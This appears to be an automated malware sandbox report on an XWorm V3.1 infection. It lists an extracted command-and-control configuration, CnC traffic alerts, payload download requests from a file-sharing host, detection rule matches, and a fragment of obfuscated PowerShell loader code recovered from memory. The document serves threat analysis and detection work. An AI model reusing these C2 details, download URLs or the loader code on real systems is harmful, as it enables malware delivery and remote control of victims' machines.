Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: nmds.duckdns.org |
Avira URL Cloud: Label: malware |
Source: 0000000F.00000002.3135063808.0000000023051000.00000004.00000800.00020000.00000000.sdmp |
Malware Configuration Extractor: Xworm {"C2 url": ["nmds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"} |
Source: unknown |
HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.10:49711 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.10:49712 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.10:49718 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.10:49719 version: TLS 1.2 |
Source: |
Binary string: \??\C:\Program Files (x86)\windows mail\wab.PDB source: wab.exe, 0000000F.00000002.3136825596.0000000025368000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Xml.ni.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: System.Configuration.pdb|c,s@ source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: Accessibility.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: System.ni.pdbRSDS source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1682044928.0000000007C22000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: Accessibility.pdb" source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: \??\C:\Windows\dll\mscorlib.pdbk8 source: wab.exe, 0000000F.00000002.3136825596.000000002534A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: $%symbols\dll\mscorlib.pdbLb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: h1%HPRo0C:\Windows\mscorlib.pdb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: ?^oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Configuration.ni.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: mscorlib.ni.pdbRSDS source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: 4%%%.pdb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Configuration.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: 1%C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbhWa source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\exe\wab.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wab.pdbGCTL source: wab.exe, 0000000F.00000002.3136825596.000000002533F000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Xml.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: System.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: System.Xml.ni.pdbRSDS# source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: wab.pdb source: wab.exe, 0000000F.00000002.3136825596.000000002533F000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbh source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.ni.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: Microsoft.VisualBasic.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: \??\C:\Program Files (x86)\windows mail\wab.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025368000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Windows.Forms.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: \??\C:\Windows\symbols\exe\wab.pdbK source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025341000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp, WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: System.Management.ni.pdbRSDSJ< source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: \??\C:\Windows\wab.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wab.pdbJ# source: wab.exe, 0000000F.00000002.3136825596.000000002534A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Drawing.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: System.Management.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: C:\Windows\mscorlib.pdbpdblib.pdb_ source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.ni.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: System.Management.ni.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: \??\C:\Windows\mscorlib.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: @^o.pdb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\mscorlib.pdbr8 source: wab.exe, 0000000F.00000002.3136825596.000000002534A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 \ source: wab.exe, 0000000F.00000002.3121592482.00000000075C0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Configuration.ni.pdbRSDScUN source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb@@_ source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.ni.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: System.Core.ni.pdbRSDS source: WERF2D5.tmp.dmp.23.dr |
Source: Traffic |
Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 12.202.180.134:8895 -> 192.168.2.10:49720 |
Source: Traffic |
Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 12.202.180.134:8895 -> 192.168.2.10:49720 |
Source: Traffic |
Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.10:49720 -> 12.202.180.134:8895 |
Source: Traffic |
Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.10:49720 -> 12.202.180.134:8895 |
Source: Joe Sandbox View |
IP Address: 69.31.136.17 69.31.136.17 |
Source: Joe Sandbox View |
IP Address: 12.202.180.134 12.202.180.134 |
Source: Joe Sandbox View |
IP Address: 104.21.28.80 104.21.28.80 |
Source: Joe Sandbox View |
IP Address: 69.31.136.57 69.31.136.57 |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/ow9148 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n3.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/ougyql HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n4.sendspace.comConnection: Keep-AliveCookie: SID=5hrvd3jvoolunq5gv3jhegf975 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/ow9148 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n3.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/ougyql HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n4.sendspace.comConnection: Keep-AliveCookie: SID=5hrvd3jvoolunq5gv3jhegf975 |
Source: global traffic |
DNS traffic detected: DNS query: www.sendspace.com |
Source: global traffic |
DNS traffic detected: DNS query: fs13n3.sendspace.com |
Source: global traffic |
DNS traffic detected: DNS query: fs03n4.sendspace.com |
Source: global traffic |
DNS traffic detected: DNS query: nmds.duckdns.org |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD435B4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://fs13n3.sendspace.com |
Source: powershell.exe, 00000003.00000002.1879512931.000002AD51831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD417C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1669254293.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.0000000023051000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: Amcache.hve.23.dr |
String found in binary or memory: http://upx.sf.net |
Source: powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 0000000C.00000002.1675028556.0000000006D81000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.microsoft.co |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD4357B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.sendspace.com |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD417C1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000C.00000002.1669254293.00000000043A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: wab.exe, 0000000F.00000003.1665443342.00000000075CA000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n4.sendspace.com/ |
Source: wab.exe, 0000000F.00000003.1657420139.00000000075CA000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n4.sendspace.com/A |
Source: wab.exe, 0000000F.00000003.1657420139.00000000075CA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.00000000075AE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.00000000075C0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.0000000007591000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1665443342.00000000075CA000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n4.sendspace.com/dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80 |
Source: wab.exe, 0000000F.00000003.1657420139.00000000075CA000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n4.sendspace.com/yK |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD435A0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspaXpAk |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD41C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD435A0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspace.com |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD41C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD41C52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD4357B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD435A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD4359C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspace.com/dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb |
Source: powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD42A5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.1879512931.000002AD51831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD43086000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD419ED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com |
Source: wab.exe, 0000000F.00000002.3121592482.0000000007558000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/ |
Source: wab.exe, 0000000F.00000002.3133396783.0000000022630000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.0000000007591000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/ougyql |
Source: powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/ow9148 |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD419ED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/ow9148P |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49711 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49712 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49711 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49719 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49719 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49718 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49718 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49712 |
Source: unknown |
HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.10:49711 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.10:49712 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.10:49718 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.10:49719 version: TLS 1.2 |
Source: amsi32_7776.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 4904, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\cmd.exe |
Process created: Commandline size = 6851 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 6875 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: Commandline size = 6851 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 6875 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 3_2_00007FF7C193B8C2 |
3_2_00007FF7C193B8C2 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 3_2_00007FF7C193AB5A |
3_2_00007FF7C193AB5A |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 12_2_00C4E928 |
12_2_00C4E928 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 12_2_00C4F1F8 |
12_2_00C4F1F8 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 12_2_00C42045 |
12_2_00C42045 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 12_2_00C4E5E0 |
12_2_00C4E5E0 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 12_2_00C41FD5 |
12_2_00C41FD5 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 15_2_22FDEB98 |
15_2_22FDEB98 |
Source: amsi32_7776.amsi.csv, type: OTHER |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: Process Memory Space: powershell.exe PID: 4904, type: MEMORYSTR |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: powershell.exe, 00000003.00000002.1894282866.000002AD59D26000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Valerianate) {Mekhitarist (Sideblikkets 'Mondr$ DuctgPulisl remgoFo,elbForfoaInf.rlCellm: orchLlufteoHensllKnsroi DetauAguismStn n=Modif$Derm,tSentar ejenuSh,uce.rein ') ;Mekhitarist $Bortfjernelsernes;Mekhitarist (Sideblikkets 'StridSFre.ntInhauaDisd.rPaleot Demi-OversSForsklGenneeTickleSla tp,riva B anc4Sub,r ');Mekhitarist (Sideblikkets 'mu.pi$Genneg,haprl M,tooImmunb AmylaGarvll Sti :MasseVPote.aMad elFordreTommyrBlid,iChalcaSt ejnHyleraTalertpho oe Unco=Visko(BecloTForuneVampisHj rnt Igno-DatisPMindeaCharlt emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee Gast)Acido ') ;Mekhitarist (Sideblikkets ' Ofr.$SudatgPiro lFucoxoyver,bCl.staSkovflNone,:ColliHSombruam itgDrbeloUfornrBeridmOve,penontrbNuncgiun urdEnsom=Attr $MoplagMandil PicroStvb,bFiltraLi.uelMine.:RheinN MaalaSpondeParreg.ickeaAerodiFoin tJewel+Fa.se+Tirre% Tarv$ProcoDdigekaD,nebg O eruSupereRe.harAwakerKursneIllegoFolketI lomyacutip Tro iHoroueMor.in Bisms Repr.Erhvec DismoUniveu Persn ambrtsilic ') ;$Disgustful=$Daguerreotypiens[$Hugormebid];}$Uncoincident=320251;$Vasiferous=29255;Mekhitarist (Sideblikkets 'Amphi$tryl g GlislRykkeoshallbPyromaAcrosl ,oui:Kumm.gPremuaOejnelHelgevforn aDi,cinCrippoFormit TaleaAggrecSplint unicijodl.c Ove. Taell=Ukamp TildaGTrompeChequtFrogg- ofllC InhaoPrebanKl,nktFrsteeSubminSaddltBlok. Wahim$ FlodRCoodle RikolPol,pa TvebtBliveigruppv Dyrep slamrUdvekoIteminTro.boOakykmChicaeSpecin TugteAppl,rBast.nAlloeeProvo ');Mekhitarist (Sideblikkets 'Bantu$TilingJocunlAnthro Mu kb udv.a KimblEncy :UdbydCTransoSab.enHomagv ShinoBaldulSmeltvRideeuChirol AnaluA,utisObli.e AxilsTrele6 Spid2Fo,la Reasc=Tortu Sekle[ PinaSHoiseyA,falsPyntetFu nee F.rhmV,cef.IndenCAryepoVi sen HavavBrneae Opfyr luertNonau]Grout:Udlic:B,rkeF kinrs ltyo FyrtmFa.veBMagniadyrtisTaurie Chon6 Natu4Che,aSKonjetkluntrE.bedi Plagn ortg Linj(aabne$VitelgTimefa undelStyrmvA.beja.ogren .issoHellit,ebetaLyv.ncM,wkitTiptiil tercCemen) M rq ');Mekhitarist (Sideblikkets 'Frank$Ac,uigOntoglOsculoReelab S lpaUnimpl anti: BrisV vantaSkrivl Tal m,xheauSaveneSu ornOrlan mili=Vintn Malo.[digreS SoppyEnkelsDefi.tTentie WheamPreco.SeksuTPi.ete krivxNavletTalel.TilsmE Minin AlkechovedoDism,d rskoiElencnZygodgUnsca]Gri,g:Gaull:JenhuA ForhSP insCFo.egIkd ndIGenga.,hitfG remteGenertBrndsS KomptLech rAlkaiiKadjanSnabeg Foto( Swip$Nu,woC.laneoHail.nSlikpvLusk oTrolll,trudvBjer,uTaplilSysteu |